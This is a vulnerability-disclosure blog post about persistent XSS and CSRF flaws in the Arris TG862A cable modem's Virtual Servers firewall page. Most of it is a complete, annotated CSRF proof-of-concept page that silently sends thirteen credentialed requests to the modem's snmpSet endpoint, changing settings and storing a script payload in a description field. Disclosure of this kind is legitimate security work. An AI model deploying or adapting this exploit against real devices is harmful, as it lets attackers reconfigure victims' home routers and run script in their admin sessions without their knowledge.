
Persistent XSS and CSRF in TG862A Arris Modem


Continuing with the bugs I found in the Arris modem series, the TG862A (TS0705125D_031115_MODEL_862_GW) Arris modem has some obvious persistent XSS and CSRF bugs in the ‘Firewall’ area.

In the Firewall->Virtual Servers section
firewall-area

We can add a new ‘Virtual Server’
add-virtual-serv

And put the malicious JavaScript code in the “Description” field
add-virtual-server-xss

After clicking the button to add a new virtual server, the page makes the requests that create it, and when the “virtual server” page containing the malicious JavaScript is loaded, it shows the alert pop-up
xss-popup

The application doesn’t have any kind of protection against CSRF attacks, and the code used for the PoC is below. 😉

<html>
  <body>
    <script>
      // PoC request 1 of 13: an asynchronous cross-site GET to the modem's
      // snmpGet endpoint. The response is not readable from the attacker's
      // origin (no CORS headers are involved), but the request itself still
      // reaches the device, which is all a CSRF needs.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        // The query carries `_n=26020` (identical in every request on this
        // page) and `_=<timestamp>`; neither is a per-session secret, so
        // nothing here acts as an anti-CSRF token. NOTE(review): what `_n`
        // actually is on the device is not determinable from this page.
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.5.12;&_n=26020&_=1448050502692", true);
        // Accept and Accept-Language are CORS-safelisted request headers, so
        // the browser sends this without a preflight.
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Attach the victim's ambient cookies / HTTP auth for 192.168.0.1.
        // Mitigation on the device side: bind state-changing actions to a
        // per-session token and check Origin/Referer; SameSite cookies also
        // stop this pattern.
        xhr.withCredentials = true;
        // body is "" so aBody has length 0 and the loop never executes; a
        // GET body is ignored by XMLHttpRequest in any case.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      // Fires as soon as the page is parsed; no user interaction needed.
      submitRequest();
    </script>
    <script>
      // PoC request 2 of 13: a second credentialed GET to snmpGet, reading a
      // different OID in the same table as request 1. Reads have no
      // side effect, but they show the endpoint is reachable cross-site.
      function submitRequest2()
      {
        var xhr = new XMLHttpRequest();
        // Same fixed `_n=26020` as every other request on this page — not a
        // session-bound token.
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.3.12;&_n=26020&_=1448050509837", true);
        // CORS-safelisted headers: no preflight is triggered.
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Send the victim's ambient credentials for 192.168.0.1.
        xhr.withCredentials = true;
        // Empty body: the loop below never runs and the Blob is empty.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest2();
    </script>
    <script>

      // PoC request 3 of 13: first state-changing request. A credentialed GET
      // to snmpSet writes one OID/value pair; the post describes this
      // sequence as the requests the Virtual Servers form issues when a new
      // entry is added. A write reachable via GET is what makes the CSRF
      // practical.
      function submitRequest3()
      {
        var xhr = new XMLHttpRequest();
        // Value and type are encoded inline as `=5;2;`; the OID semantics are
        // not determinable from this page.
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=5;2;&_n=26020&_=1448050512017", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient cookies / HTTP auth for the device are attached.
        xhr.withCredentials = true;
        // Empty body; the copy loop is effectively dead code here.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest3();
    </script>
    <script>
      // PoC request 4 of 13: the write that plants the stored XSS. The
      // percent-encoded value decodes to `test<script>alert(1)</script>` —
      // the "Description" payload from the post — and is stored via snmpSet
      // without server-side encoding, so it executes when the Virtual
      // Servers page renders it. Mitigation: HTML-encode on output and
      // reject/escape markup on input for this field.
      function submitRequest4()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.2.1=test%3Cscript%3Ealert(1)%3C%2Fscript%3E;4;&_n=26020&_=1448050516100", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for 192.168.0.1 ride along with the request.
        xhr.withCredentials = true;
        // Empty body; the loop never executes.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest4();
    </script>
    <script>
      // PoC request 5 of 13: another credentialed snmpSet write in the same
      // .4.12.1 table, value `666;66;`. Field meaning is not determinable
      // from this page.
      function submitRequest5()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.3.1=666;66;&_n=26020&_=1448050518619", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Victim's ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest5();
    </script>
    <script>
      // PoC request 6 of 13: credentialed snmpSet write, same table as the
      // previous requests, value `666;66;`.
      function submitRequest6()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.4.1=666;66;&_n=26020&_=1448050530861", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient cookies / HTTP auth for 192.168.0.1 are sent.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest6();
    </script>
    <script>
      // PoC request 7 of 13: credentialed snmpSet write, value `1;2;`.
      function submitRequest7()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.5.1=1;2;&_n=26020&_=1448050533971", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest7();
    </script>
    <script>
      // PoC request 8 of 13: credentialed snmpSet write, value `1;2;`.
      function submitRequest8()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.6.1=1;2;&_n=26020&_=1448050539233", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest8();
    </script>
    <script>
      // PoC request 9 of 13: credentialed snmpSet write. The value is a
      // percent-encoded `$`-prefixed hex string (`$C0A8000A`); its meaning
      // is not determinable from this page.
      function submitRequest9()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.7.1=%24C0A8000A;4;&_n=26020&_=1448050545672", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest9();
    </script>
    <script>
      // PoC request 10 of 13: credentialed snmpSet write, value `666;66;`.
      function submitRequest10()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.9.1=666;66;&_n=26020&_=1448050550616", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest10();
    </script>
    <script>
      // PoC request 11 of 13: credentialed snmpSet write, value `666;66;`.
      function submitRequest11()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.10.1=666;66;&_n=26020&_=1448050556630", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest11();
    </script>
    <script>
      // PoC request 12 of 13: credentialed snmpSet write to the same OID as
      // request 3 (.4.12.1.11.1), now with value `1;2;`.
      function submitRequest12()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=1;2;&_n=26020&_=1448050559849", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest12();
    </script>
    <script>
      // PoC request 13 of 13: final credentialed snmpSet write. It targets
      // a different OID subtree (.1.9.0) than the preceding writes, which
      // all hit the .4.12.1 table; its semantics are not determinable from
      // this page. Like the rest, it succeeds only because the device
      // accepts state changes over GET with ambient credentials and no
      // request-bound token.
      function submitRequest13()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.9.0=1;2;&_n=26020&_=1448050563269", true);
        // CORS-safelisted headers: no preflight.
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // Ambient credentials for the device are attached.
        xhr.withCredentials = true;
        // Empty body; loop never runs.
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest13();
    </script>
  </body>
</html>

Regards.

Update: the vulnerabilities are still present in TS0705125E_111615_MODEL_862_GW


Written by m0nad

novembro 20, 2015 às 9:29 pm

Publicado em Uncategorized
